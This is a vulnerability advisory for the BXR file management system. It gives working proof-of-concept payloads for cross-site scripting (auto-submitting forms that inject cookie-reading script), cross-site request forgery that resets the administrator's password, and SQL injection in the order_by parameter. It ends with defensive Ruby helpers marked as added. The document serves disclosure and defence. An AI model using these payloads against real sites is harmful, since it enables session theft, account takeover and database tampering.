High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in BXR which could be exploited to perform cross-site scripting, cross-site request forgery and SQL injection attacks.
Cross-site scripting (XSS) vulnerability in BXR
1.1 The vulnerability exists due to an input sanitization error in the "setting[site_title]" parameter in /settings/update_settings/. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.
Exploitation example:
<form action="http://host/settings/update_settings" method="post" name="main" >
<input type="hidden" name="setting[site_title]" value='BXR File Management System"><script>alert(document.cookie)</script>' />
<input type="hidden" name="setting[site_keywords]" value="BXR, Open Source File Management System" />
<input type="hidden" name="setting[site_description]" value="The Free, Open Source, Ruby on Rails File Management System." />
<input type="hidden" name="setting[let_users_change_default_folder]" value="0" />
<input type="hidden" name="setting[use_ferret]" value="0" />
<input type="hidden" name="setting[overwrite_existing_files]" value="0" />
<input type="hidden" name="commit" value="Update Settings" />
</form>
<script>
document.main.submit();
</script>
1.2 The vulnerability exists due to an input sanitization error in the "search[query]" parameter in /search/show_results/. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.
Exploitation example:
<form action="http://host/search/show_results" method="post" name="main" >
<input type="hidden" name="search_type" value="filename" />
<input type="hidden" name="search[query]" value='1"><script>alert(document.cookie)</script>' />
<input type="hidden" name="commit" value="Find!" />
</form>
<script>
document.main.submit();
</script>
1.3 The vulnerability exists due to an input sanitization error in the "tag_1" parameter in /file/do_the_upload/. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.
Cross-site request forgery in BXR
The vulnerability exists due to insufficient validation of the request origin in /user/update/. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link, and change the administrator's credentials.
Exploitation example:
<form action="http://host/user/update/1" method="post" name="main" >
<input type="hidden" name="user[name]" value="admin" />
<input type="hidden" name="user[email]" value="[email protected]" />
<input type="hidden" name="user[password]" value="123" />
<input type="hidden" name="user[password_confirmation]" value="123" />
<input type="hidden" name="belongs_to_group[1]" value="yes" />
<input type="hidden" name="user[default_folder_id]" value="1" />
<input type="hidden" name="commit" value="Save" />
</form>
<script>
document.main.submit();
</script>
SQL injection vulnerability in BXR: CVE-2010-4963
The vulnerability exists due to an input sanitization error in the "order_by" parameter in /folder/list. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in the application's database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation example:
http://host/folder/list?order_by=filesize'+SQL
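As an added defender-side example (written here, not BXR's own code), the Ruby helpers below show the three fixes the findings above call for: an allow-list for the order_by sort column so the parameter never reaches SQL text, output-time HTML escaping for stored settings such as site_title, and a constant-time anti-CSRF token check for state-changing requests. The column names and the module name are assumptions.

```ruby
require 'erb'

# Hypothetical hardening helpers for the BXR endpoints named in the advisory.
module BxrHardening
  # Columns the folder listing may legitimately sort by (assumed set).
  ALLOWED_ORDER_COLUMNS = %w[filename filesize created_at].freeze
  ALLOWED_DIRECTIONS    = %w[asc desc].freeze

  # Build the ORDER BY clause for /folder/list. The untrusted order_by value is
  # mapped onto the allow-list and never interpolated into SQL, so an input like
  # "filesize'+SQL" simply falls back to the default column.
  def self.order_clause(order_by, direction = 'asc')
    column = ALLOWED_ORDER_COLUMNS.include?(order_by) ? order_by : 'filename'
    dir    = direction.to_s.downcase
    dir    = 'asc' unless ALLOWED_DIRECTIONS.include?(dir)
    "ORDER BY #{column} #{dir.upcase}"
  end

  # Render a stored setting such as site_title inside an HTML document.
  # Escaping at output time means a stored "><script> payload is displayed
  # as text instead of being executed in the viewer's browser.
  def self.render_title(site_title)
    "<title>#{ERB::Util.html_escape(site_title)}</title>"
  end

  # Check that a state-changing request (e.g. POST /user/update/1) carries the
  # anti-CSRF token issued with the logged-in session. A cross-site form cannot
  # read that token, so a forged submission fails this check.
  def self.csrf_valid?(session_token, submitted_token)
    return false if session_token.nil? || submitted_token.nil?
    return false unless session_token.bytesize == submitted_token.bytesize
    # Constant-time comparison: XOR every byte and OR the results together.
    diff = session_token.bytes.zip(submitted_token.bytes).reduce(0) { |acc, (a, b)| acc | (a ^ b) }
    diff.zero?
  end
end
```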